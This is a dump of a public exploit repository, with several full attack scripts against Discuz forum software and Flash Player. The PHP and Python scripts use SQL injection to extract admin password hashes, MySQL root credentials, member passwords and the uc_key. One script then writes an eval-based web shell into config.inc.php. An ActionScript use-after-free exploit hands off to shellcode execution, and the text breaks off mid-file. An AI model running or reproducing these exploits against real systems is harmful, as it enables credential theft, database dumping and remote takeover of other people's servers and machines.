https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/dedecms v55漏洞利用.htm -------------------------------------------------------------------------------- /dede/dede注入导出.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/dede注入导出.html -------------------------------------------------------------------------------- /dz/discuz.php: -------------------------------------------------------------------------------- 1 | 126 )) 38 | {$result.=" .";} 39 | else 40 | {$result.=" ".$string[$i];} 41 | if (strlen(dechex(ord($string[$i])))==2) 42 | {$exa.=" ".dechex(ord($string[$i]));} 43 | else 44 | {$exa.=" 0".dechex(ord($string[$i]));} 45 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 46 | } 47 | return $exa."\r\n".$result; 48 | } 49 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; 50 | 51 | function sendpacketii($packet) 52 | { 53 | global $proxy, $host, $port, $html, $proxy_regex; 54 | if ($proxy=='') { 55 | $ock=fsockopen(gethostbyname($host),$port); 56 | if (!$ock) { 57 | echo 'No response from '.$host.':'.$port; die; 58 | } 59 | } 60 | else { 61 | $c = preg_match($proxy_regex,$proxy); 62 | if (!$c) { 63 | echo 'Not a valid proxy...';die; 64 | } 65 | $parts=explode(':',$proxy); 66 | echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; 67 | $ock=fsockopen($parts[0],$parts[1]); 68 | if (!$ock) { 69 | echo 'No response from proxy...';die; 70 | } 71 | } 72 | fputs($ock,$packet); 73 | if ($proxy=='') { 74 | $html=''; 75 | while (!feof($ock)) { 76 | $html.=fgets($ock); 77 | } 78 | } 79 | else { 80 | $html=''; 81 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 82 | $html.=fread($ock,1); 83 | } 84 | } 85 | fclose($ock); 86 | } 87 | 88 | $host=$argv[1]; 89 | $path=$argv[2]; 90 | $port=80; 91 | $proxy=""; 92 | for ($i=3; $i<$argc; $i++){ 93 | $temp=$argv[$i][0].$argv[$i][1]; 94 | if ($temp=="-p") 95 | { 96 | $port=str_replace("-p","",$argv[$i]); 97 | } 98 | if ($temp=="-P") 99 | { 100 | $proxy=str_replace("-P","",$argv[$i]); 101 | } 102 | } 103 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 104 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 105 | 106 | echo "please wait...\n"; 107 | 108 | //from global.func.php 109 | function authcode($string, $operation, $key = '') { 110 | $key = $key ? $key : $GLOBALS['discuz_auth_key']; 111 | $coded = ''; 112 | $keylength = 32; 113 | $string = $operation == 'DECODE' ? base64_decode($string) : $string; 114 | for($i = 0; $i < strlen($string); $i += 32) { 115 | $coded .= substr($string, $i, 32) ^ $key; 116 | } 117 | $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded; 118 | return $coded; 119 | } 120 | 121 | //stolen from install.php 122 | function random($length) { 123 | $hash = ''; 124 | $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; 125 | $max = strlen($chars) - 1; 126 | mt_srand((double)microtime() * 1000000); 127 | for($i = 0; $i < $length; $i++) { 128 | $hash .= $chars[mt_rand(0, $max)]; 129 | } 130 | return $hash; 131 | } 132 | 133 | $agent="Googlebot/2.1"; 134 | //see sql errors... you need auth key, 135 | //it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;) 136 | $tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);} 137 | while (1) 138 | { 139 | $discuz_auth_key=random(32); 140 | $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n"; 141 | $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof 142 | $packet.="User-Agent: $agent\r\n"; 143 | $packet.="Host: ".$host."\r\n"; 144 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n"; 145 | $packet.="Accept: text/plain\r\n"; 146 | $packet.="Connection: Close\r\n\r\n"; 147 | $packet.=$data; 148 | sendpacketii($packet); 149 | $html=html_entity_decode($html); 150 | $html=str_replace("
","",$html); 151 | $t=explode("AND m.password='",$html); 152 | $t2=explode("' ",$t[1]); 153 | $pwd_f=$t2[0]; 154 | $t=explode("AND m.secques='",$html); 155 | $t2=explode("'\n",$t[1]); 156 | $secques_f=$t2[0]; 157 | $t=explode("AND m.uid='",$html); 158 | $t2=explode("'\x0d",$t[1]); 159 | $uid_f=$t2[0]; 160 | $my_string=$pwd_f."\t".$secques_f."\t".$uid_f; 161 | if ((strlen($my_string)==270) and (!eregi("=",$my_string))){ 162 | break; 163 | } 164 | } 165 | $temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE"); 166 | //calculating key... 167 | $key=""; 168 | for ($j=0; $j<32; $j++){ 169 | for ($i=0; $i<255; $i++){ 170 | $aa=""; 171 | if ($j<>0){ 172 | for ($k=1; $k<=$j; $k++){ 173 | $aa.="a"; 174 | } 175 | } 176 | $GLOBALS['discuz_auth_key']=$aa.chr($i); 177 | $t = authcode($temp,"DECODE"); 178 | if ($t[$j]==$my_string[$j]){ 179 | $key.=chr($i); 180 | } 181 | } 182 | } 183 | 184 | //echo "AUTH KEY ->".$key."\r\n"; 185 | $GLOBALS['discuz_auth_key']=$key; 186 | 187 | echo "pwd hash (md5) -> "; 188 | $chars[0]=0;//null 189 | $chars=array_merge($chars,range(48,57)); //numbers 190 | $chars=array_merge($chars,range(97,102));//a-f letters 191 | $j=1;$password=""; 192 | while (!strstr($password,chr(0))) 193 | { 194 | for ($i=0; $i<=255; $i++) 195 | { 196 | if (in_array($i,$chars)) 197 | { 198 | //you can use every char because of base64_decode()...so this bypass magic quotes... 199 | //and some help by extract() to overwrite vars 200 | $sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 201 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 202 | $packet.="User-Agent: $agent\r\n"; 203 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 204 | $packet.="Host: ".$host."\r\n"; 205 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 206 | $packet.="Accept: text/plain\r\n"; 207 | $packet.="Connection: Close\r\n\r\n"; 208 | $packet.=$data; 209 | sendpacketii($packet); 210 | if (eregi("action=groupexpiry",$html)){ 211 | $password.=chr($i);echo chr($i);sleep(1);break; 212 | } 213 | } 214 | if ($i==255) { 215 | die("\nExploit failed..."); 216 | } 217 | } 218 | $j++; 219 | } 220 | 221 | echo "\nadmin user -> "; 222 | $j=1;$admin=""; 223 | while (!strstr($admin,chr(0))) 224 | { 225 | for ($i=0; $i<=255; $i++) 226 | { 227 | $sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 228 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 229 | $packet.="User-Agent: $agent\r\n"; 230 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 231 | $packet.="Host: ".$host."\r\n"; 232 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 233 | $packet.="Accept: text/plain\r\n"; 234 | $packet.="Connection: Close\r\n\r\n"; 235 | $packet.=$data; 236 | sendpacketii($packet); 237 | if (eregi("action=groupexpiry",$html)){ 238 | $admin.=chr($i);echo chr($i);sleep(1);break; 239 | } 240 | if ($i==255) {die("\nExploit failed...");} 241 | } 242 | $j++; 243 | } 244 | 245 | function is_hash($hash) 246 | { 247 | if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 248 | else {return false;} 249 | } 250 | 251 | if (is_hash($password)) { 252 | echo "exploit succeeded..."; 253 | } 254 | else { 255 | echo "exploit failed..."; 256 | } 257 | ?> 258 | -------------------------------------------------------------------------------- /dz/discuz4.1.php: -------------------------------------------------------------------------------- 1 | 126 )) 36 | {$result.=" .";} 37 | else 38 | {$result.=" ".$string[$i];} 39 | if (strlen(dechex(ord($string[$i])))==2) 40 | {$exa.=" ".dechex(ord($string[$i]));} 41 | else 42 | {$exa.=" 0".dechex(ord($string[$i]));} 43 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 44 | } 45 | return $exa."\r\n".$result; 46 | } 47 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; 48 | 49 | function sendpacketii($packet) 50 | { 51 | global $proxy, $host, $port, $html, $proxy_regex; 52 | if ($proxy=='') { 53 | $ock=fsockopen(gethostbyname($host),$port); 54 | if (!$ock) { 55 | echo 'No response from '.$host.':'.$port; die; 56 | } 57 | } 58 | else { 59 | $c = preg_match($proxy_regex,$proxy); 60 | if (!$c) { 61 | echo 'Not a valid proxy...';die; 62 | } 63 | $parts=explode(':',$proxy); 64 | echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; 65 | $ock=fsockopen($parts[0],$parts[1]); 66 | if (!$ock) { 67 | echo 'No response from proxy...';die; 68 | } 69 | } 70 | fputs($ock,$packet); 71 | if ($proxy=='') { 72 | $html=''; 73 | while (!feof($ock)) { 74 | $html.=fgets($ock); 75 | } 76 | } 77 | else { 78 | $html=''; 79 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 80 | $html.=fread($ock,1); 81 | } 82 | } 83 | fclose($ock); 84 | } 85 | 86 | $host=$argv[1]; 87 | $path=$argv[2]; 88 | $port=80; 89 | $proxy=""; 90 | for ($i=3; $i<$argc; $i++){ 91 | $temp=$argv[$i][0].$argv[$i][1]; 92 | if ($temp=="-p") 93 | { 94 | $port=str_replace("-p","",$argv[$i]); 95 | } 96 | if ($temp=="-P") 97 | { 98 | $proxy=str_replace("-P","",$argv[$i]); 99 | } 100 | } 101 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 102 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 103 | 104 | echo "please wait...\n"; 105 | 106 | //from global.func.php 107 | function authcode($string, $operation, $key = '') { 108 | $key = $key ? $key : $GLOBALS['discuz_auth_key']; 109 | $coded = ''; 110 | $keylength = 32; 111 | $string = $operation == 'DECODE' ? base64_decode($string) : $string; 112 | for($i = 0; $i < strlen($string); $i += 32) { 113 | $coded .= substr($string, $i, 32) ^ $key; 114 | } 115 | $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded; 116 | return $coded; 117 | } 118 | 119 | //stolen from install.php 120 | function random($length) { 121 | $hash = ''; 122 | $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; 123 | $max = strlen($chars) - 1; 124 | mt_srand((double)microtime() * 1000000); 125 | for($i = 0; $i < $length; $i++) { 126 | $hash .= $chars[mt_rand(0, $max)]; 127 | } 128 | return $hash; 129 | } 130 | 131 | $agent="Googlebot/2.1"; 132 | //see sql errors... you need auth key, 133 | //it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;) 134 | $tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);} 135 | while (1) 136 | { 137 | $discuz_auth_key=random(32); 138 | $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n"; 139 | $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof 140 | $packet.="User-Agent: $agent\r\n"; 141 | $packet.="Host: ".$host."\r\n"; 142 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n"; 143 | $packet.="Accept: text/plain\r\n"; 144 | $packet.="Connection: Close\r\n\r\n"; 145 | $packet.=$data; 146 | sendpacketii($packet); 147 | $html=html_entity_decode($html); 148 | $html=str_replace("
","",$html); 149 | $t=explode("AND m.password='",$html); 150 | $t2=explode("' ",$t[1]); 151 | $pwd_f=$t2[0]; 152 | $t=explode("AND m.secques='",$html); 153 | $t2=explode("'\n",$t[1]); 154 | $secques_f=$t2[0]; 155 | $t=explode("AND m.uid='",$html); 156 | $t2=explode("'\x0d",$t[1]); 157 | $uid_f=$t2[0]; 158 | $my_string=$pwd_f."\t".$secques_f."\t".$uid_f; 159 | if ((strlen($my_string)==270) and (!eregi("=",$my_string))){ 160 | break; 161 | } 162 | } 163 | $temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE"); 164 | //calculating key... 165 | $key=""; 166 | for ($j=0; $j<32; $j++){ 167 | for ($i=0; $i<255; $i++){ 168 | $aa=""; 169 | if ($j<>0){ 170 | for ($k=1; $k<=$j; $k++){ 171 | $aa.="a"; 172 | } 173 | } 174 | $GLOBALS['discuz_auth_key']=$aa.chr($i); 175 | $t = authcode($temp,"DECODE"); 176 | if ($t[$j]==$my_string[$j]){ 177 | $key.=chr($i); 178 | } 179 | } 180 | } 181 | 182 | //echo "AUTH KEY ->".$key."\r\n"; 183 | $GLOBALS['discuz_auth_key']=$key; 184 | 185 | echo "pwd hash (md5) -> "; 186 | $chars[0]=0;//null 187 | $chars=array_merge($chars,range(48,57)); //numbers 188 | $chars=array_merge($chars,range(97,102));//a-f letters 189 | $j=1;$password=""; 190 | while (!strstr($password,chr(0))) 191 | { 192 | for ($i=0; $i<=255; $i++) 193 | { 194 | if (in_array($i,$chars)) 195 | { 196 | //you can use every char because of base64_decode()...so this bypass magic quotes... 197 | //and some help by extract() to overwrite vars 198 | $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 199 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 200 | $packet.="User-Agent: $agent\r\n"; 201 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 202 | $packet.="Host: ".$host."\r\n"; 203 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 204 | $packet.="Accept: text/plain\r\n"; 205 | $packet.="Connection: Close\r\n\r\n"; 206 | $packet.=$data; 207 | sendpacketii($packet); 208 | if (eregi("action=groupexpiry",$html)){ 209 | $password.=chr($i);echo chr($i);sleep(1);break; 210 | } 211 | } 212 | if ($i==255) { 213 | die("\nExploit failed..."); 214 | } 215 | } 216 | $j++; 217 | } 218 | 219 | echo "\nadmin user -> "; 220 | $j=1;$admin=""; 221 | while (!strstr($admin,chr(0))) 222 | { 223 | for ($i=0; $i<=255; $i++) 224 | { 225 | $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 226 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 227 | $packet.="User-Agent: $agent\r\n"; 228 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 229 | $packet.="Host: ".$host."\r\n"; 230 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 231 | $packet.="Accept: text/plain\r\n"; 232 | $packet.="Connection: Close\r\n\r\n"; 233 | $packet.=$data; 234 | sendpacketii($packet); 235 | if (eregi("action=groupexpiry",$html)){ 236 | $admin.=chr($i);echo chr($i);sleep(1);break; 237 | } 238 | if ($i==255) {die("\nExploit failed...");} 239 | } 240 | $j++; 241 | } 242 | 243 | function is_hash($hash) 244 | { 245 | if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 246 | else {return false;} 247 | } 248 | 249 | if (is_hash($password)) { 250 | echo "exploit succeeded..."; 251 | } 252 | else { 253 | echo "exploit failed..."; 254 | } 255 | ?> 256 | -------------------------------------------------------------------------------- /dz/dz7-2getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: gbk -*- 3 | # -*- coding: gb2312 -*- 4 | # -*- coding: utf_8 -*- 5 | # author iswin 6 | import sys 7 | import hashlib 8 | import time 9 | import math 10 | import base64 11 | import urllib2 12 | import urllib 13 | import re 14 | 15 | def sendRequest(url,para): 16 | try: 17 | data = urllib.urlencode(para) 18 | req=urllib2.Request(url,data) 19 | res=urllib2.urlopen(req,timeout=20).read() 20 | except Exception, e: 21 | print 'Exploit Failed!\n%s'%(e) 22 | exit(0); 23 | return res 24 | 25 | def getTablePrefix(url): 26 | print 'Start GetTablePrefix...' 27 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 28 | res=sendRequest(url,para); 29 | pre=re.findall("Duplicate entry '(.*?)'",res); 30 | if len(pre)==0: 31 | print 'Exploit Failed!' 32 | exit(0); 33 | table_pre=pre[0][:len(pre[0])-1].decode('hex') 34 | table_pre=table_pre[0:table_pre.index('_')] 35 | print 'Table_pre:%s'%(table_pre) 36 | return table_pre 37 | 38 | def getCurrentUser(url): 39 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 40 | res=sendRequest(url,para) 41 | pre=re.findall("Duplicate entry '(.*?)'",res) 42 | if len(pre)==0: 43 | print 'Exploit Failed!' 44 | exit(0); 45 | table_pre=pre[0][:len(pre[0])-1] 46 | print 'Current User:%s'%(table_pre) 47 | return table_pre 48 | 49 | def getUcKey(url): 50 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 51 | para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 52 | res=sendRequest(url,para); 53 | res1=sendRequest(url,para1); 54 | key1=re.findall("Duplicate entry '(.*?)'",res) 55 | key2=re.findall("Duplicate entry '(.*?)'",res1) 56 | if len(key1)==0: 57 | print 'Get Uc_Key Failed!' 58 | return '' 59 | key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1] 60 | print 'uc_key:%s'%(key) 61 | return key 62 | 63 | def getRootUser(url): 64 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 65 | res=sendRequest(url,para); 66 | pre=re.findall("Duplicate entry '(.*?)'",res) 67 | if len(pre)==0: 68 | print 'Exploit Failed!' 69 | exit(0); 70 | table_pre=pre[0][:len(pre[0])-1].split(' ') 71 | print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1]) 72 | 73 | def dumpData(url,table_prefix,count): 74 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)} 75 | res=sendRequest(url,para); 76 | datas=re.findall("Duplicate entry '(.*?)'",res) 77 | if len(datas)==0: 78 | print 'Exploit Failed!' 79 | exit(0) 80 | cleandata=datas[0][:len(datas[0])-1] 81 | info=cleandata.split(' ') 82 | print 'user:%s pass:%s'%(info[0],info[1]) 83 | 84 | def microtime(get_as_float = False) : 85 | if get_as_float: 86 | return time.time() 87 | else: 88 | return '%.8f %d' % math.modf(time.time()) 89 | 90 | def get_authcode(string, key = ''): 91 | ckey_length = 4 92 | key = hashlib.md5(key).hexdigest() 93 | keya = hashlib.md5(key[0:16]).hexdigest() 94 | keyb = hashlib.md5(key[16:32]).hexdigest() 95 | keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] 96 | cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 97 | key_length = len(cryptkey) 98 | string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string 99 | string_length = len(string) 100 | result = '' 101 | box = range(0, 256) 102 | rndkey = dict() 103 | for i in range(0,256): 104 | rndkey[i] = ord(cryptkey[i % key_length]) 105 | j=0 106 | for i in range(0,256): 107 | j = (j + box[i] + rndkey[i]) % 256 108 | tmp = box[i] 109 | box[i] = box[j] 110 | box[j] = tmp 111 | a=0 112 | j=0 113 | for i in range(0,string_length): 114 | a = (a + 1) % 256 115 | j = (j + box[a]) % 256 116 | tmp = box[a] 117 | box[a] = box[j] 118 | box[j] = tmp 119 | result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) 120 | return keyc + base64.b64encode(result).replace('=', '') 121 | 122 | def get_shell(url,key,host): 123 | headers={'Accept-Language':'zh-cn', 124 | 'Content-Type':'application/x-www-form-urlencoded', 125 | 'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)', 126 | 'Referer':url 127 | } 128 | tm = time.time()+10*3600 129 | tm="time=%d&action=updateapps" %tm 130 | code = urllib.quote(get_authcode(tm,key)) 131 | url=url+"?code="+code 132 | data1=''' 133 | 134 | http://xxx\');eval($_POST[3]);// 135 | ''' 136 | try: 137 | req=urllib2.Request(url,data=data1,headers=headers) 138 | ret=urllib2.urlopen(req) 139 | except: 140 | return "Exploit Falied" 141 | data2=''' 142 | 143 | http://aaa 144 | ''' 145 | try: 146 | req=urllib2.Request(url,data=data2,headers=headers) 147 | ret=urllib2.urlopen(req) 148 | except: 149 | return "error" 150 | 151 | try: 152 | req=urllib2.Request(host+'/config.inc.php') 153 | res=urllib2.urlopen(req,timeout=20).read() 154 | except Exception, e: 155 | print 'GetWebshell Failed,%s'%(e) 156 | return 157 | print "webshell:"+host+"/config.inc.php,password:3" 158 | 159 | if __name__ == '__main__': 160 | print 'DZ7.x Exp Code By iswin' 161 | if len(sys.argv)<3: 162 | print 'DZ7.x Exp Code By iswin\nusage:python dz7.py http://www.iswin.org 10' 163 | exit(0) 164 | url=sys.argv[1]+'/faq.php' 165 | count=int(sys.argv[2]) 166 | user=getCurrentUser(url) 167 | if user.startswith('root@'): 168 | getRootUser(url) 169 | uc_key=getUcKey(url) 170 | if len(uc_key)==64: 171 | print 'Start GetWebshell...' 172 | get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1]) 173 | tb_pre=getTablePrefix(url) 174 | print 'Start DumpData...' 175 | for x in xrange(0,count): 176 | dumpData(url,tb_pre,x) 177 | -------------------------------------------------------------------------------- /dz/faqgetshell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dz/faqgetshell.py -------------------------------------------------------------------------------- /dz/uckeygetshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dz/uckeygetshell.php -------------------------------------------------------------------------------- /ecshop/ECSHOP各版本注入通杀漏洞.htm: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | Ecshop SQL Injection Exp [4 Fucker Team] 5 |
-------------------------------------------------------------------------------- /ecshop/全版本注入exp.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ecshop/全版本注入exp.html -------------------------------------------------------------------------------- /ecshop/要注册账号ECSHOP各版本注入通杀漏洞.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ecshop/要注册账号ECSHOP各版本注入通杀漏洞.html -------------------------------------------------------------------------------- /fcgi_exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/fcgi_exp.zip -------------------------------------------------------------------------------- /flash0day/calc.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | -------------------------------------------------------------------------------- /flash0day/exp1/MyClass.as: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.display.DisplayObjectContainer; 4 | import fl.controls.Button; 5 | import fl.controls.TextArea; 6 | import flash.utils.ByteArray; 7 | import flash.system.Capabilities; 8 | import flash.events.MouseEvent; 9 | import flash.external.ExternalInterface; 10 | 11 | 12 | public class MyClass 13 | { 14 | static var 15 | _log:TextArea, 16 | _gc:Array, 17 | _va:Array, 18 | _ba:ByteArray, 19 | _isDbg:Boolean = Capabilities.isDebugger; 20 | 21 | // prints text message into the text area 22 | static function logAdd(str:String):void 23 | { 24 | _log.htmlText += "
" + str;
 25 | 		}
 26 | 		
 27 | 		// define malicious valueOf()
 28 | 		prototype.valueOf = function ()
 29 | 		{
 30 | 			logAdd("MyClass.valueOf()");
 31 | 			
 32 | 			_va = new Array(5);
 33 | 			_gc.push(_va); // protect from GC // for RnD
 34 | 			
 35 | 			// reallocate _ba storage
 36 | 			_ba.length = 0x1100;
 37 | 			
 38 | 			// reuse freed memory
 39 | 			for(var i:int; i < _va.length; i++)
 40 | 				_va[i] = new Vector.(0x3f0);
 41 | 			
 42 | 			// return one byte for overwriting
 43 | 			return 0x40;
 44 | 		}
 45 | 		
 46 | 		// try to corrupt the length value of Vector.
 47 | 		static function TryExpl() : Boolean
 48 | 		{
 49 | 			try
 50 | 			{
 51 | 				var alen:int = 90; // should be multiply of 3
 52 | 				var a = new Array(alen);
 53 | 				if (_gc == null) _gc = new Array();
 54 | 				_gc.push(a); // protect from GC // for RnD
 55 | 				
 56 | 				// try to allocate two sequential pages of memory: [ ByteArray ][ MyClass2 ]
 57 | 				for(var i:int; i < alen; i+=3){
 58 | 					a[i] = new MyClass2(i);
 59 | 					
 60 | 					a[i+1] = new ByteArray();
 61 | 					a[i+1].length = 0xfa0;
 62 | 					
 63 | 					a[i+2] = new MyClass2(i+2);
 64 | 				}
 65 | 				
 66 | 				// find these pages
 67 | 				var v:Vector.;
 68 | 				for(i=alen-5; i >= 0; i-=3)
 69 | 				{
 70 | 					// take next allocated ByteArray
 71 | 					_ba = a[i];
 72 | 					// call valueOf() and cause UaF memory corruption 
 73 | 					_ba[3] = new MyClass();
 74 | 					// _ba[3] should be unchanged 0
 75 | 					logAdd("_ba[3] = " + _ba[3]);
 76 | 					if (_ba[3] != 0) throw new Error("can't cause UaF");
 77 | 					
 78 | 					// check results // find corrupted vector
 79 | 					for(var j:int=0; j < _va.length; j++){
 80 | 						v = _va[j];
 81 | 						if (v.length != 0x3f0) {
 82 | 							logAdd("v.length = 0x" + v.length.toString(16));
 83 | 							
 84 | 							// check the [ MyClass2 ] presence after [ ByteArray ]
 85 | 							var k:int = 0x400 + 70;
 86 | 							if (v[k] == 0x11223344) {
 87 | 								// ok, scroll k to mc.a0
 88 | 								do k-- while (v[k] == 0x11223344);
 89 | 								var mc:MyClass2 = a[v[k]];
 90 | 								mc.length = 0x123;
 91 | 								
 92 | 								//logAdd("k = " + (k - 0x400) + ", mc = " + MyUtils.ToStringV(v, 0x400, 64));
 93 | 								
 94 | 								//check for x64 and proceed to payload execution
 95 | 								if ((k - 0x400) > 40) {
 96 | 									if (MyUtils.isWin()) {
 97 | 										if (ShellWin64.Init(v, 0x1000, mc, k-8)) ShellWin64.Exec() else logAdd("Fail.");
 98 | 									}else
 99 | 									if (MyUtils.isMac()) {
100 | 										if (ShellMac64.Init(v, 0x1000, mc, k-8)) ShellMac64.Exec() else logAdd("Fail.");
101 | 									}else
102 | 										logAdd("todo: unsupported x64 os");
103 | 								} else {
104 | 									if (MyUtils.isWin()) {
105 | 										if (ShellWin32.Init(v, (v[k-4] & 0xfffff000) - 0x1000 + 8, mc, k-4)) ShellWin32.Exec() else logAdd("Fail.");
106 | 									}else
